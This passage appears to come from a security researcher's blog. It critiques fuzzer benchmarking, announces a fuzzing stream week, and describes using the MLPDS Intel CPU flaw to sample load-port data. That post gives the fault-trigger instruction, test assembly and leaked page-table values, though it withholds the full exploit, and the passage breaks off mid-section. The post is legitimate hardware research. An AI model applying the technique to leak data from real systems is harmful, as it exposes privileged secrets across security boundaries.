Scaling also puts a lot of pressure on infeasible fuzzing strategies proposed in papers. We’ve all seen them, the high-introspection techniques which extract memory, register, taint state from a small program and promise great results. I don’t disagree with the results, the more information you extract, pretty much directly correlates to an increase in coverage/case. But, eventually the data load gets very hard to share between cores, queue between servers, and even just process.

Measuring symbolic

Measuring symbolic was brought up a few times, as it would definitely have a much better coverage/case than a traditional fuzzer. But this nuance can easily be handled by looking at both coverage/case and coverage/time graphs. Learning what works well algorithmically should drive our engineering efforts to solve problems. While symbolic may have huge performance issues, it’s very likely that many of the parts of it (eg. taint tracking) can be approximated with lossy algorithms and data capturing, and it’s more about learning where it has strengths and weaknesses. Many of the analyses I’ve done on symbolic largely lead me to vectorized emulation, which allows for highly-compressed, approximated taint tracking, while still getting near-native (or even better) execution speeds.

The case against monolithic fuzzers

Learning what works is important to figure out where to invest our engineering time. Given the quality of code in fuzzing right now (often very poor), there’s a lot of things that I’d hate to see us rule out because our current methodologies do not support them. I really care about my reset times of fuzz cases, (often: the fork() costs), as well as determinism. In a fully deterministic environment, with fast resets, a lot of approximate strategies can be used. Trying to approximate where bytes came from in an input, flipping the bytes because you have a branch target which is interesting, and then smashing those bytes in can give good information about the relation of those bytes to the input. Hell, with fast resets and forking, you can do partial fuzzing where you fork() and snapshot multiple times during a fuzz case, and you can progressively fuzz “from” different points in the parser. This works especially well for protocols where you can snapshot at each packet boundary.
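
A tiny sketch of the partial fuzzing idea (the types and RNG are stand-ins), assuming we already collected one snapshot per packet boundary while replaying a recorded session:

/// Memory + register state captured at one packet boundary
struct Snapshot;

/// Pick a random packet boundary to restore to, then fuzz the traffic from
/// that point onwards against fully built-up parser state
fn partial_fuzz(snapshots: &[Snapshot], mut run_case: impl FnMut(&Snapshot)) {
    assert!(!snapshots.is_empty());
    let mut seed = 0x12345678_9abcdef1u64;

    loop {
        // Cheap xorshift instead of a real RNG, just for the sketch
        seed ^= seed << 13;
        seed ^= seed >> 7;
        seed ^= seed << 17;

        let snap = &snapshots[(seed as usize) % snapshots.len()];
        run_case(snap);
    }
}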

These sorts of techniques and analyses don’t really work when we have monolithic fuzzers. The performance of existing fuzzers is often quite poor (AFL fork(), etc), or does not support partial execution (persistent modes, libfuzzer, etc). This leads to us not being able to even research these techniques. As we keep bolting things onto existing fuzzers and treating them like big blobs, we’ll get further and further from being able to learn the isolated properties of fuzzers and find the best places to apply certain strategies.

Why I don’t care much about fuzzer performance for benchmarking

Reset speed

AFL fork() bottlenecks for me often around 10-20k execs/sec on a single core, and about 40-50k on the whole system, even with 96C/192T systems. This is largely due to just getting stuck on kernel allocations and locks. Spinning up processes is expensive, and largely out of our control. AFL allows access of the local system and kernel to the fuzz case, thus cases are not deterministic, nor are they isolated (in the case of fuzzing something with lock files). This requires using another abstraction layer like docker, which adds more overhead to the equation. My hypervisors that I use for fuzzing can reset a Windows VM 1 million times per second on a single core, and scale linearly with cores, while being deterministic. Why does this matter? Well, we’re comparing tooling which isn’t even remotely hitting the capabilities of the CPUs, rather they’re bottlenecking on the kernel. These are solvable problems, and thus, as a consumer of good ideas but not tooling, I’m interested in what works well. I can make it go fast myself.

Determinism

Most fuzzers that we work with now are not deterministic. You cannot expect instruction-for-instruction determinism between cases. This makes it a lot harder to use complex fuzzing strategies which may rely on the results of a prior execution being identical to a future one. This is largely an engineering problem, and can be solved in both system-level and app-level targets.

Mutation performance

The performance of mutators is often not what it can be. For example, honggfuzz used (now fixed, cheers!) temporary allocations during multiple passes. During its mangle_MemSwap it made a copy of the chunk that was to be swapped, performing 3 memcpys and using a temporary allocation. This logic was able to be implemented using a single memcpy and without a dynamic allocation. This is not a criticism of honggfuzz, but more of an important note of how development often occurs. Early prototyping, success, and rare revisiting of what can be changed. What’s my point here? Well, the mutation strategies in many fuzzers may introduce timing properties that are not fundamentally required to have identical behaviors. There’s nothing wrong with this, but it is additional noise which factors into time-based benchmarks. This means a good strategy can be hurt by a bad implementation, or, just a naive one that was done early on. This is noise that I think is big to remove from analysis such that we can try to learn what ideas work, and engineer them later.

Further, I don’t know of any mutational fuzzer which doesn’t mutate in-place. This means the multiple splices and removals from an input must end up memcpy()ing the remainder. This is a very common mutation pass. This means the fuzzer slows down dramatically with respect to the input file size, which is something we see almost every fuzzer put insane restrictions on (AFL has a fit if you give it anything but a tiny file).

There’s nothing stopping us from making a tree-based fuzzer where a splice adds a node to the tree and updates metadata on other nodes. The input could be serialized once when it’s ready to be consumed, or even better, serialized on-demand, only providing the parts of the file which actually were used during the fuzz case.

Example:

Initial input: "foobar", tree is [pointer to "foobar", length 6]
Splice "baz" at 3: [pointer to "foo", length 3][pointer to "baz", length 3][pointer to "bar", length 3]
Program read()s 3 bytes, return "foo" without serializing the rest
Program crashes, tree can be saved or even just what has read can be saved

In this, the cost is N updates to some basic metadata, where N is the number of mutations performed on that input (often 5-10). On a new fuzz case, you start with an initial input in one node of the tree, and you can once again split it up as needed. Pretty much no memcpy()s need to be performed, nor allocations, as the input can be extended such that in-memory it’s “foobarbaz”, but the metadata describes that the “baz” should come between “foo” and “bar”.
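
A minimal sketch of that chunk-list representation follows; the exact layout here is made up, but it shows how a splice turns into metadata edits plus an append to a grow-only backing buffer, and how serialization can stop at however many bytes the target actually read.

// Grow-only backing buffer plus ordered chunk metadata; a splice never moves
// existing bytes, it only splits a chunk descriptor and appends new bytes
struct TreeInput {
    backing: Vec<u8>,             // e.g. "foobar" with "baz" appended later
    chunks:  Vec<(usize, usize)>, // (offset into backing, length)
}

impl TreeInput {
    fn new(initial: &[u8]) -> Self {
        Self { backing: initial.to_vec(), chunks: vec![(0, initial.len())] }
    }

    // Splice `data` into the logical input at byte position `pos`
    fn splice(&mut self, pos: usize, data: &[u8]) {
        let mut logical = 0;
        for ii in 0..self.chunks.len() {
            let (off, len) = self.chunks[ii];
            if pos <= logical + len {
                let split   = pos - logical;
                let new_off = self.backing.len();
                self.backing.extend_from_slice(data);

                // Replace [chunk] with [left][new][right], skipping empties
                let mut repl = Vec::new();
                if split > 0   { repl.push((off, split)); }
                repl.push((new_off, data.len()));
                if split < len { repl.push((off + split, len - split)); }
                self.chunks.splice(ii..ii + 1, repl);
                return;
            }
            logical += len;
        }
    }

    // Serialize on demand, and only as much as the target actually consumed
    fn serialize(&self, limit: usize) -> Vec<u8> {
        let mut out = Vec::new();
        for &(off, len) in &self.chunks {
            if out.len() >= limit { break; }
            let take = len.min(limit - out.len());
            out.extend_from_slice(&self.backing[off..off + take]);
        }
        out
    }
}

With this, the “foobar” example above becomes backing “foobarbaz” with chunks [(0, 3), (6, 3), (3, 3)], and a 3-byte read only ever serializes “foo”.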

Restructuring the way we do mutations like this allows us to probably easily find 10x improvements in mutator performance (read, not overall fuzzer performance). Meaning, I don’t really want the cost of the mutator to be part of the equation, because once again, it’s likely a result of laziness or simplicity. If something really brings a strategy to the table that is excellent, we can likely make it work just as fast (but likely even faster), than existing strategies.

Not to mention the value in potentially knowing which mutations were used during prior cases: you could mutate this tree itself (eg, change a splice from 5 bytes to 8 bytes, without changing the offset, just changing the node in the mutation tree). This could also be used as a mechanism to dynamically weight mutation strategies based on yields, while still getting a performance gain over the naive implementation.

Performance conclusion

From previous work with fuzzers, most of the reset, overhead, and corruption logic is likely not even within an order of magnitude of the possible performance. Thus, I’m far more interested in figuring out what and where strategies work, as the implementations of them are typically not indicative of their performance.

BUT! I recognize the value in treating them as whole systems. I’m a bit more on the hard-core engineering side of the problem. I’m interested in which strategies work, not which tools. There’s definitely value in knowing which tools will work best, given you don’t have the time to tweak or rebuild them yourself. That being said, I think scaling is much more important here, as I don’t know of really anyone doing single-core fuzzing. The results of these fuzzers at scale are likely dramatically different from single-core, and would put some major pressure on some more theoretical ideas which produce way too much information to consume and handle.

Reconstructing the full picture from data

The data I would like to see fuzzbench give, and I’d give you some massive props for doing it, would be the raw, microsecond-timestamped information for each coverage gain.

This means, every time coverage increases, a new CSV record (or whatever format) is generated, including the time stamp when it was found (to the microsecond), as well as the fuzz iteration ID which indicates how many inputs have been run into the fuzzer. This should also include a unique identifier of the block which was found.
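
Something as small as this would do it (field names here are purely illustrative, not a proposed standard):

// One record emitted every time new coverage is found
struct CoverageEvent {
    timestamp_us: u64, // microseconds since the campaign started
    case_id:      u64, // how many fuzz cases had been executed at this point
    block_id:     u64, // unique identifier of the newly covered block/edge
}

// e.g. as a CSV line: 1530280,148223,0x004017f3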

This means, in post, the entire progress of the fuzzer can be reconstructed. Every edge, which edges they were, the times they were found, and the case ID they were on when they were found allows comparing not only the raw “edge count” but also the differences between edges found. It’s crazy that this information is not part of the benchmark, as almost all the fuzzers could be finding nearly the same coverage, but a fuzzer which finds less coverage, but completely unique edges, would be devalued.

This is the firehose of data, but since it’s not collected on an interval, it very quickly turns into almost no data.

Hard problem: What is coverage?

This leads to a really hard problem. How do we compare coverage between tools? Can we safely create a unique block identifier which is universal between all the fuzzers and their targets? I have no idea how fuzzbench solves this (or even if it does). If fuzzbench is relying on the fuzzers to have roughly the same idea of what an edge is, I’d say the results are completely invalid. Having different passes which add different coverage gathering or comparison-information gathering could easily affect the graphs. Even just non-determinism in clang (or whatever compiler) would make me uneasy about whether afl-clang binaries have identical graph shapes to libfuzzer-clang binaries.

If fuzzbench does solve this problem, I’m curious as to how. I’d anticipate it would be through a coverage pass which is standardized between all targets. If this is the case, are they using the same binaries? If they’re not, are the binaries deterministic, or can the fuzzers affect the benchmark coverage information by adding their own compiler instrumentation?

Further, if this is the case, it makes it much harder to compare emulators or other tools which gather their own coverage in a unique way. For example, if my emulators, which get coverage for effectively free, had to run an instrumented binary for fuzzbench to get data, it’s not a realistic comparison. My fuzzer would be penalized twice for coverage gathering, even though it doesn’t need the instrumented binary.

Maybe someone solved this problem, and I’m curious what the solution is. TL;DR: Are we actually comparing the same binaries with identical graphs, and is this fair to fuzzers which do not need compile-time instrumentation?

The end

Can’t wait for more discussion. You have been very receptive even when I’m often a bit strongly opinionated. I respect that a lot.

Stay cute,

gamozo

Fuzz Week 2020

12 July 2020 at 07:11

Summary

Welcome to fuzz week 2020! This week (July 13th - July 17th) I’ll be streaming every day going through some of the very basics of fuzzing all the way to cutting edge research. I want to use this time to talk about some things related to fuzzing, particularly when it comes to benchmarking and comparing fuzzers with each other.

Schedule

Ha. There’s really no schedule, there is no script, there is no plan, but here’s a rough outline of what I want to cover.

I will be streaming on my Twitch channel at approximately 14:00 PST. But things aren’t really going to be on a strict schedule.

My Twitter is probably the best source of information for when things are about to start.

Everything will be recorded and uploaded to my YouTube.

July 13th

The very basics of fuzzing. We’ll write our own fuzzer and tweak it to improve it. We’ll probably start by writing it in Python, and eventually talk about the performance ramifications and the basics of scaling fuzzers by using threads or multiple processes. We’ll also compare our newly written fuzzer against AFL and see where AFL outperforms it, and also where AFL has some blind spots.

July 14th

Here we’ll cover code coverage. We might get to this sooner, who knows. But we’re going to write our own tooling to gather code coverage information such that we can see not only how easy it is to set up, but how flexible coverage information can be while still proving quite useful!

July 15th-17th

Here we’ll focus mainly on the advanced aspects of fuzzing. While this sounds complex, fuzzing really hasn’t become that complex yet, so follow along! We’ll go through some of the more deep performance properties of fuzzing, mainly focused around snapshot fuzzing.

Once we’ve discussed some basics of performance and snapshot fuzzing, we’ll start talking about the meaningfulness of comparing fuzzers. Namely, the difficulties in comparing fuzzers when they may involve different concepts of what a crash, coverage, or input are. We’ll look at some existing examples of papers which compare fuzzers, and see how well they actually prove their point.

Biases

I think it’s important when doing something like this, to make it clear what my existing biases are. I’ve got a few.

  • I think existing fuzzers have some major performance problems and struggle to scale. I consider this to be a high priority as general performance improvements to fuzzing harnesses makes both generic fuzzers (eg. AFL, context-unaware fuzzers) and hand-crafted (targeted) fuzzers better.
  • I don’t think outperforming AFL is impressive. AFL is impressive because it’s got an easy-to-use workflow, which makes it accessible to many different users, broadening the amount of targets it has been used against.
  • I don’t really think comparing fuzzers is reasonable.
  • I think it is very easy to over-fit a fuzzer to small programs, or add unrealistic amounts of information extraction from a target under test, in a way that the concepts are not generally applicable to many targets that exceed basic parsers. I think this is where a lot of current research falls.

But… that’s mainly the point of this week. To either find out my biases are wildly incorrect, or to maybe demonstrate why I have some of the biases. So, how will I address some of these (in order of prior bullets)?

  • I’ll compare some of my fuzzers against AFL. We’ll see if we can outperform AFL in terms of raw fuzz cases performed, as well as the results (coverage and crashes).
  • I’ll try to demonstrate that a basic fuzzer with 1/100th the amount of code of AFL is capable of getting much better results, and that it’s really not that hard to write.
  • I’ll propose some techniques that can be used to compare fuzzers, and go through my own personal process of evaluating fuzzers. I’m not trying to get papers, or funding, or anything. I don’t really have an interest in making things look comparatively better. If they perform differently, but have different use cases, I’d rather understand those cases and apply them specifically rather than have a one-shoe-fits-all solution.
  • I’ll go through some instrumentation that I’ve historically added to my fuzzers which give them massive result and coverage boosts, but consume so much information that they cannot meaningfully scale past tiny pieces of code. I’ll go through when these things may actually be useful, as sometimes isolating components is viable. I’ll also go through some existing papers and see what sorts of results are being claimed, and if they actually have general applicability.

Winging it

It’s important to note, nothing here is scheduled. Things may go much faster, slower, or just never happen. That’s the beauty of research. I may be very wrong with some of my biases, and we’ll hopefully correct those. I love being wrong.

I’ve maybe thought of having some fuzzing figureheads pop on the stream for random discussions/conversations/interviews. If this is something that sounds interesting to you, reach out and we can maybe organize it!

Sound fun?

See you there :)


CPU Introspection: Intel Load Port Snooping

30 December 2019 at 04:11

Load sequence example

Frequencies of observed values over time from load ports. Here we’re seeing the processor internally performing a microcode-assisted page table walk to update accessed and dirty bits. Only one load was performed by the user, these are all “invisible” loads done behind the scenes

Twitter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I often will post data and graphs from data as it comes in and I learn!


Foreword

First of all, I’d like to say that I’m super excited to write up this blog. This is an idea I’ve had for over a year and I only recently got to working on. The initial implementation and proof-of-concept of this idea was actually implemented live on my Twitch! This proof-of-concept went from nothing at all to a fully-working-as-predicted implementation in just about 3 hours! Not only did the implementation go much smoother than expected, the results are by far higher resolution and signal-to-noise than I expected!

This blog is fairly technical, and thus I highly recommend that you read my previous blog on Sushi Roll, my CPU research kernel where this technique was implemented. In the Sushi Roll blog I go a little bit more into the high-level details of Intel micro-architecture and it’s a great introduction to the topic if you’re not familiar.

YouTube video for PoC implementation

Recording of the stream where we implemented this idea as a proof-of-concept. Click for the YouTube video!


Summary

We’re going to go into a unique technique for observing and sequencing all load port traffic on Intel processors. By using a CPU vulnerability from the MDS set of vulnerabilities, specifically microarchitectural load port data sampling (MLPDS, CVE-2018-12127), we are able to observe values which fly by on the load ports. Since (to my knowledge) all loads must end up going through load ports, regardless of requestor, origin, or caching, this means that, in theory, the contents of every load ever performed can be observed. By using a creative scanning technique we’re able to not only view “random” loads as they go by, but sequence loads to determine the ordering and timing of them.

We’ll go through some examples demonstrating that this technique can be used to view all loads as they are performed on a cycle-by-cycle basis. We’ll look into an interesting case of the micro-architecture updating accessed and dirty bits using a microcode assist. These are invisible loads dispatched on the CPU on behalf of the user when a page is accessed for the first time.

Why

As you may be familiar, x86 is quite a complex architecture with many nooks and crannies. As time has passed it has only gotten more complex, leaving more and more of its inner workings undocumented or unknown. There are many instructions with complex microcode invocations which access memory, as was seen through my work on Sushi Roll. This led to me being curious as to what is actually going on with load ports during some of these operations.

Intel CPU traffic during a normal write

Intel CPU traffic on load ports (ports 2 and 3) and store ports (port 4) during a traditional memory write

Intel CPU traffic during a write requiring dirty/accessed updates

Intel CPU traffic on load ports (ports 2 and 3) and store ports (port 4) during the same memory write as above, but this time where the page table entries need an accessed/dirty bit update

Beyond just directly invoked microcode due to instructions being executed, microcode also gets executed on the processor during “microcode assists”. These operations, while often undocumented, are referenced a few times throughout Intel manuals. Specifically in the Intel Optimization Manual there are references to microcode assists during accessed and dirty bit updates. Further, there is a restriction on TSX sections such that they may abort when accessed and dirty bits need to be updated. These microcode assists are fascinating to me, as while I have no evidence for it, I suspect they may be subject to different levels of permissions and validations compared to traditional operations. Whenever I see code executing on a processor as a side-effect of user operations, all I think is: “here be dragons”.


A playground for CPU bugs

When I start auditing a target, the first thing that I try to do is get introspection into what is going on. If the target is an obscure device then I’ll likely try to find some bug that allows me to image the entire device, and load it up in an emulator. If it’s some source code I have that is partial, then I’ll try to get some sort of mocking of the external calls it’s making and implement them as I come by them. Once I have the target running on my terms, and not the terms of some locked down device or environment, then I’ll start trying to learn as much about it as possible…

This is no different from what I did when I got into CPU research. Starting when Meltdown and Spectre came out, I became the go-to person for writing PoCs for CPU bugs. I developed a few custom OSes early on that were just designed to give a pass/fail indicator of whether a CPU bug could be exploited in a given environment. This was critical in helping test the mitigations that went in place for each CPU bug as they were reported, as testing whether these mitigations worked is a surprisingly hard problem.

This led to me having some cleanly made OS-level CPU exploits written up. The custom OS proved to be a great way to test the mitigations, especially as the signal was much higher compared to a traditional OS. In fact, the signal was almost just a bit too strong…

When in a custom operating system it’s a lot easier to play around with weird behaviors of the CPU, without worrying about it affecting the system’s stability. I can easily turn off interrupts, overwrite exception handlers with specialized ones, change MSRs to weird CPU states, and so on. This led to me ending up with almost a playground for CPU vulnerability testing with some pretty standard primitives.

As the number of primitives I had grew, I was able to PoC out a new CPU bug in typically under a day. But then I had to wonder… what would happen if I tried to get as much information out of the processor as possible.


Sushi Roll

And that was the start of Sushi Roll, my CPU research kernel. I have a whole blog about the Sushi Roll research kernel, and I strongly recommend you read it! Effectively Sushi Roll is a custom kernel with message passing between cores rather than memory sharing. This means that each core has a complete copy of the kernel with no shared accesses. For attacks which need to observe the faintest signal in memory behaviors, this led to a great amount of isolation.

When looking for a behavior you already understand on a processor, it’s pretty easy to get a signal. But, when doing initial CPU research into the unknowns and undefined behavior, getting this signal out takes every advantage you can get. Thus in this low-noise CPU research environment, even the faintest leak would cause a pretty large disruption in determinism, which would likely show up as a measurable result earlier than traditional blind CPU research would allow.

Performance Counter Monitoring

In Sushi Roll I implemented a creative technique for monitoring the values in performance counters along with time-stamping them in cycles. Some of the performance counters in Intel processors count things like the number of micro-ops dispatched to each of the execution units on the core. Some of these counters increase during speculation, and with this data and time-stamping I was able to get some of the first-ever insights into what processor behavior was actually occurring during speculation!

Example uarch activity Example cycle-by-cycle profiling of the Kaby Lake micro-architecture, warning: log-scale y-axis

Being able to collect this sort of data immediately made unexpected CPU behaviors easier to catalog, measure, and eventually make deterministic. The more understanding we can get of the internals of the CPU, the better!


The Ultimate Goal

The ultimate goal of my CPU research is to understand so thoroughly how the Intel micro-architecture works that I can predict it with emulation models. This means that I would like to run code through an emulated environment and it would tell me exactly how many internal CPU resources would be used, which lines from caches and buffers would be evicted and what contents they would hold. There’s something beautiful to me to understanding something so well that you can predict how it will behave. And so the journey begins…

Past Progress

So far with the work in Sushi Roll we’ve been able to observe how the CPU dispatches uops during specific portions of code. This allows us to see which CPU resources are used to fulfill certain requests, and thus can provide us with a rough outline of what is happening. With simple CPU operations this is often all we need; as there are only so many ways to perform a certain operation, the complete picture can usually be drawn just from guessing “how they might have done it”. However, when more complex operations are involved, all of that goes out the window.

When reading through Intel manuals I saw many references to microcode assists. These are “situations” in your processor which may require microcode to be dispatched to execution units to perform some complex-ish logic. These are typically edge cases which don’t occur frequently enough for the processor to worry about handling them in hardware, rather just needing to detect them and cause some assist code to run. We know of one microcode assist which is relatively easy to trigger, updating the accessed and dirty bits in the page tables.

Accessed and dirty bits

In the Intel page table (and honestly most other architectures) there’s a concept of accessed and dirty bits. These bits indicate whether or not a page has ever been translated (accessed), or if it has been written to (dirtied). On Intel it’s a little strange as there is only a dirty bit on the final page table entry. However, the accessed bits are present on each level of the page table during the walk. I’m quite familiar with these bits from my work with hypervisor-based fuzzing, as they allow high-performance differential resetting of VMs by simply walking the page tables and restoring pages that were dirtied back to their original state from a snapshot.
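
As a rough sketch of why the dirty bit is so handy there (with completely made-up snapshot and guest memory structures), a differential reset only has to touch the pages whose dirty bit was set since the snapshot was taken:

// Bit 6 of an x86 PTE is the dirty bit
const PTE_DIRTY: u64 = 1 << 6;

// Restore only the pages the guest wrote to since the snapshot. A real
// implementation would walk the actual paging hierarchy and flush the TLB;
// the flat `ptes` slice here is just to keep the sketch short.
fn differential_reset(ptes: &mut [u64], guest: &mut [u8], snapshot: &[u8], page_size: usize) {
    for (idx, pte) in ptes.iter_mut().enumerate() {
        if *pte & PTE_DIRTY != 0 {
            let start = idx * page_size;
            guest[start..start + page_size]
                .copy_from_slice(&snapshot[start..start + page_size]);
            *pte &= !PTE_DIRTY; // next reset only touches newly dirtied pages
        }
    }
}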

But this leads to a curiosity… what is the mechanism responsible for setting these bits? Does the internal page table silicon set these during a page table walk? Are they set after the fact? Are they atomically set? Are they set during speculation or faulting loads?

From Intel manuals and some restrictions with TSX it’s pretty obvious that accessed and dirty bits are a bit of an anomaly. TSX regions will abort when memory is touched that does not have the respective accessed or dirty bits set. That’s strange; why would this be a limitation of the processor?

TSX aborts during accessed and dirty bit updates

Accessed and dirty bits causing TSX aborts from the Intel® 64 and IA-32 architectures optimization reference manual

… weird huh? Testing it out yields exactly what the manual says. If I write up some sample code which accesses memory which doesn’t have the respective accessed or dirty bits set, it aborts every time!
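
Here’s roughly what that test looks like, assuming the RTM intrinsics in core::arch are available, and that the caller has already cleared the accessed/dirty bits for the page behind ptr and flushed its TLB entry:

// Returns true if the transaction aborted. Touching a page whose
// accessed/dirty bits still need updating should abort every time.
#[target_feature(enable = "rtm")]
unsafe fn touch_aborts(ptr: *mut u64) -> bool {
    use core::arch::x86_64::{_xbegin, _xend, _XBEGIN_STARTED};
    if _xbegin() == _XBEGIN_STARTED {
        // This write requires the CPU to set the accessed+dirty bits, which
        // (per the optimization manual) forces the transaction to abort
        core::ptr::write_volatile(ptr, 0x41414141);
        _xend();
        false // transaction committed
    } else {
        true // we got here via an abort
    }
}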

What’s next?

So now we have an ability to view what operation types are being performed on the processor. However this doesn’t tell us a huge amount of information. What we would really benefit from would be knowing the data contents that are being operated on. We can pretty easily log the data we are fetching in our own code, but that won’t give us access to the internal loads that happen as side effects on the processor, nor would it tell us about the contents of loads which happen during speculation.

Surely there’s no way to view all loads which happen on the processor right? Almost anything during speculation is a pain to observe, and even if we could observe the data it’d be quite noisy.

Or maybe there is a way…

… a way?

Fortunately there may indeed be a way! A while back I found a CPU vulnerability which allowed for random values to be sampled off of the load ports. While this vulnerability was initially thought to only allow random values to be sampled from the load ports, perhaps we can get a bit more creative about leaking…


Microarchitectural Load Port Data Sampling (MLPDS)

Microarchitectural load port data sampling sounds like an overly complex name, but it’s actually quite simple in the end. It’s a set of CPU flaws in Intel processors which allow a user to potentially get access to stale data recently transferred through load ports. This was actually a bug that I reported to Intel a while back, and they ended up finding a few similar issues with different instruction combinations; this set of issues is ultimately what comprises MLPDS.

MLPDS Intel Description

Description of MLPDS from Intel’s MDS DeepDive

The specific bug that I found was initially called “cache line split” or “cache line split load” and it’s exactly what you might expect: a data access which straddles a cache line (a multi-byte load with some bytes on one cache line and the remaining bytes on another). Cache lines are 64 bytes in size, so any multi-byte memory access to an address with the bottom 6 bits set would cause this behavior. These accesses must also cause a fault or an assist, but by using TSX it’s pretty easy to get whatever behavior you would like.

This bug is largely an issue when hyper-threading is enabled as this allows a sibling thread to be executing protected/privileged code while another thread uses this attack to observe recently loaded data.

I found this bug when working on early PoCs of L1TF when we were assessing the impact it had. In my L1TF PoC (which was using random virtual addresses each attempt) I ended up disabling the page table modification. This ultimately is the root requirement for L1TF to work, and to my surprise, I was still seeing a signal. I initially thought it was some sort of CPU bug leaking registers as the value I was leaking was never actually read in my code. It turns out what I ended up observing was the hypervisor itself context switching my VM. What I was leaking was the contents of the registers as they were loaded during the context switch!

Unfortunately MLPDS has a really complex PoC…

mov rax, [-1]

After this instruction executes and it faults or aborts, the contents of rax during a small speculative window will potentially contain stale data from load ports. That’s all it takes!

From this point it’s just some trickery to get the 64-bit value leaked during the speculative window!


It’s all too random

Okay, so MLPDS allows us to sample a “random” value which was recently loaded on the load ports. This is a great start as we could probably run this attack over and over and see what data is observed on a sample piece of code. Using hyper-threading for this attack will be ideal because we can have one thread running some sample code in an infinite loop, while the other thread observes the values seen on the load port.

An MLPDS exploit

Since there isn’t yet a public exploit for MLPDS, especially with the data rates we’re going to use here, I’m just going to go over the high-level details and not show how it’s implemented under the hood.

For this MLPDS exploit I use a couple different primitives. One is a pretty basic exploit which simply attempts to leak the raw contents of whatever value went over the load ports. This value that we leak is always 64-bits, but we can choose to only leak a few of the bytes from it (or even at bit-level granularity). There’s a performance increase for the fewer bytes that we leak as it decreases the number of cache lines we need to prime-and-probe each attempt.

There’s also another exploit type that I use that allows me to look for a specific value in memory, which turns the leak from a multi-byte leak to just a boolean “was value/wasn’t value”. This is the highest performance version due to how little information has to be leaked past the speculative window.

All of these leaks will leak a specific value from a single speculative run. For example if we were to leak a 64-bit value, the 64-bit value will be from one MLPDS exploit and one speculative window. Getting an entire 64-bit value out during a single speculative window is a surprisingly hard problem, and I’m going to keep that as my own special sauce for a while. Compared to many public CPU leak exploits, this attack does not loop multiple times using masks to slowly reveal a value, it will get revealed from a single attempt. This is critical to us as otherwise we wouldn’t be able to observe values which are loaded once.

Here’s some of the leak rate numbers for the current version of MLPDS that I’m using:

Leak type            Leaks/second
Known 64-bit value      5,979,278
8-bit any value           228,479
16-bit any value          116,023
24-bit any value           25,175
32-bit any value           13,726
40-bit any value           12,713
48-bit any value           10,297
56-bit any value            9,521
64-bit any value            8,234

It’s important to note that the known 64-bit value search is much faster than all of the others. We’ll make some good use of this later!

Test

Let’s try out a simple MLPDS attack on a small piece of code which loops forever fetching 2 values from memory.

mov  rax, 0x12345678f00dfeed
mov [0x1000], rax

mov  rax, 0x1337133713371337
mov [0x1008], rax

2:
    mov rax, [0x1000]
    mov rax, [0x1008]
    jmp 2b

This code should in theory just cause two loads: one of the value 0x12345678f00dfeed and another of the value 0x1337133713371337. Let’s spin this up on a hardware thread and have the sibling thread perform MLPDS in a loop! We’ll use our 64-bit any value MLPDS attack and just histogram all of the different values we observe being leaked.

Sampling done:
    0x12345678f00dfeed : 100532
    0x1337133713371337 : 99217

Voila! Here we see the two different secret values on the attacking thread, at pretty much comparable frequencies.

Cool… so now we have a technique that will allow us to see the contents of all loads on load ports, but only as random samples. Let’s take a look at the weird behaviors during accessed bit updates by clearing the accessed bit on the final-level page table entry every loop iteration in the same code above.

Sampling done:
    0x0000000000000008 : 559
    0x0000000000000009 : 2316
    0x000000000000000a : 142
    0x000000000000000e : 251
    0x0000000000000010 : 825
    0x0000000000000100 : 19
    0x0000000000000200 : 3
    0x0000000000010006 : 438
    0x000000002cc8c000 : 3796
    0x000000002cc8c027 : 225
    0x000000002cc8d000 : 112
    0x000000002cc8d027 : 57
    0x000000002cc8e000 : 1
    0x000000002cc8e027 : 35
    0x00000000ffff8bc2 : 302
    0x00002da0ea6a5b78 : 1456
    0x00002da0ea6a5ba0 : 2034
    0x0000700dfeed0000 : 246
    0x0000700dfeed0008 : 5081
    0x0000930000000000 : 4097
    0x00209b0000000000 : 15101
    0x1337133713371337 : 2028
    0xfc91ee000008b7a6 : 677
    0xffff8bc2fc91b7c4 : 2658
    0xffff8bc2fc9209ed : 4565
    0xffff8bc2fc934019 : 2

Whoa! That’s a lot more values than we saw before. It’s not just the two values we’re loading in a loop; there are many other values. Strangely, the 0x1234... value is missing as well. Interesting. Well, since we know these loads happen during accessed bit updates, perhaps some of these are entries from the page table walk. Let’s look at the page table entries for the page we’re hitting.

CR3   0x630000
PML4E 0x2cc8e007
PDPE  0x2cc8d007
PDE   0x2cc8c007
PTE   0x13370003

Oh! How cool is that!? In the loads we’re leaking we see the raw page table entries with various versions of the accessed and dirty bits set! Here are the loads which stand out to me:

Leaked values:

    0x000000002cc8c000 : 3796                                                   
    0x000000002cc8c027 : 225                                                    
    0x000000002cc8d000 : 112                                                    
    0x000000002cc8d027 : 57                                                     
    0x000000002cc8e000 : 1                                                      
    0x000000002cc8e027 : 35 

Actual page table entries for the page we're accessing:

CR3   0x630000                                                                  
PML4E 0x2cc8e007                                                                
PDPE  0x2cc8d007                                                                
PDE   0x2cc8c007                                                                
PTE   0x13370003

The entries are being observed as 0x...27 as the 0x20 bit is the accessed bit for page table entries.
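
For reference, here’s the bit decode of one of those leaked entries; these are just the architectural x86-64 paging bits, nothing specific to this experiment:

// Decode an x86-64 page table entry, e.g. 0x2cc8c027
fn decode_pte(pte: u64) {
    println!("frame:    {:#x}", pte & 0x000f_ffff_ffff_f000);
    println!("present:  {}",    pte & (1 << 0) != 0); // 0x01
    println!("writable: {}",    pte & (1 << 1) != 0); // 0x02
    println!("user:     {}",    pte & (1 << 2) != 0); // 0x04
    println!("accessed: {}",    pte & (1 << 5) != 0); // 0x20
    println!("dirty:    {}",    pte & (1 << 6) != 0); // 0x40
}

// decode_pte(0x2cc8c027): frame 0x2cc8c000, present, writable, user,
// accessed set, dirty clear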

Other notable entries are 0x0000930000000000 and 0x00209b0000000000 which look like the GDT entries for the code and data segments. 0x0000700dfeed0000 and 0x0000700dfeed0008 which are the 2 virtual addresses I’m accessing the un-accessed memory from. Who knows about the rest of the values? Probably some stack addresses in there…

So clearly, as we expected, the processor is dispatching uops which are performing a page table walk. Sadly we have no idea what the order of this walk is; maybe we can find a creative technique for sequencing these loads…


Sequencing the Loads

Sequencing the loads that we are leaking with MLPDS is going to be critical to getting meaningful information. Without knowing the ordering of the loads we simply know the contents of loads. Which is a pretty awesome amount of information, I’m definitely not complaining… but come on, it’s not perfect!

But perhaps we can limit the timing of our attack to a specific window, and infer ordering based on that. If we can find some trigger point where we can synchronize time between the attacker thread and the thread with secrets, we could change the delay between this synchronization and the leak attempt. By sweeping this delay we should hopefully get a cycle-by-cycle view of observed values.

A trigger point

